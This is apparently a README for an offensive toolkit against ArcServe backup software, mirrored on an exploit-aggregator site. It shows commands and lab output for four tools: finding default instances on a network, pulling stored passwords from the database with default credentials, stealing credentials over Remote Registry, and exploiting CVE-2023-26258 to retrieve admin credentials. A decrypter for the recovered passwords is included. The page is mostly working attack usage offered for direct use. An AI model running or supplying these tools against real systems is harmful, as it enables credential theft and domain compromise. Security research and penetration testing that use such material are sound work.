Share
## https://sploitus.com/exploit?id=C73CE2F0-7D60-5E97-80C6-1A5693E17605
The **TL; DR;**

If you are in the network you can scan for instances configured by default using `ArcServeRadar.py`. I tried to port it to C# but couldn't, feel free to do it if you know how :)

```bash
c:\Users\vagrant\Desktop>python ArcServeRadar.py "Ethernet 2" 6969 192.168.56.20
                -=[ ArcServe Finder - @TheXC3LL  - MDSec ]=-


[*] Starting to monitor
[*] Broadcasting
WARNING: Mac address to reach destination not found. Using broadcast.
        [+] 192.168.56.10 => ServerName;KINGSLANDING;InstanceName;ARCSERVE_APP;IsClustered;No;Version;15.0.2000.5;tcp;62197;;
```
If it is configured by default you can use default DB creds to connect to the IP and port obtained before and read the username/password plus where the ArcServe instances are located using `ArcServe-dbpwner.py`:

```bash

psyconauta@insulanova:/tmp|โ‡’  python3 arcserve-dbpwner.py -target 192.168.56.10 -port 62197
		-=[ ArcServe credential retriever (from DB) - Juan Manuel Fernandez (@TheXC3LL)  - MDSec]=-


[*] Connecting to the server
[*] Login with default creds
[*] Extracting credentials:
	[+] User: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
	[+] User: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[*] Finding hosts:
	[+] 192.168.56.10 | kingslanding.sevenkingdoms.local | Windows Server 2019 Datacenter Evaluation
	[+] 192.168.56.10 | kingslanding.sevenkingdoms.local | NULL


 Have a nice day! ^_^
```

All the passwords retrieved by the tools can be decrypted using `ArcServeDecrypter.exe`. Just edit the C code to add the array, compile and execute it:

```bash
C:\Users\vagrant>C:\Users\vagrant\source\repos\ArcServeDecrypter\x64\Debug\ArcServeDecrypter.exe
                -={ ArcServe Decryptor by Juan Manuel Fernandez (@TheXC3LL) - MDSec}=-

[+] Decrypted string: vagrant
```

If you have a user with local admin privileges on the server where ArcServe is installed you can read the credentials using Remote Registry service (`arcserve-regkeys.py`):

```bash
psyconauta@insulanova:/tmp|โ‡’  python3 arcserve-regkeys.py -u eddard.stark -p 'FightP3aceAndHonor!' -d sevenkingdoms.local -target-ip 192.168.56.20
		-=[ ArcServe Credential Stealer - (@TheXC3LL) - MDSec]=-
[+] Connecting to 192.168.56.20
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Opening registry key
	[*] User: P3TWLADS11STD\vagrant
	[*] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[+] Stopping Remote Registry Service

Have a nice day! ^_^
```

Finally, if the ArcServe version was not patched (**CVE-2023-26258**) you can exploit an authentication bypass in the management web interface and retrieve the admin creds (`ArcServe-exploit.py`):

```bash
psyconauta@insulanova:/tmp|โ‡’  python3 ArcServe-exploit.py 192.168.56.10
		-=[ ArcServe Pwner by Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-


[*] Triggering info leak
	[+] AdminName: SEVENKINGDOMS\vagrant
	[+] AuthUUID: 6bf37b8e-ac4f-487d-8d74-d6d0a8d9b8d1
[*] Getting a valid session
	[+] Session: AGENTJSESSIONID=CA35EF18A4FF2F85E25538F60C3F7428
[*] Doing an authenticated request to validate if session is valid
[*] Session is valid
	[+] Admin: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98} // Paste it to the decrypter


Have a happy hacking! ^_^
```

So here ends the summary of tools that you can find here.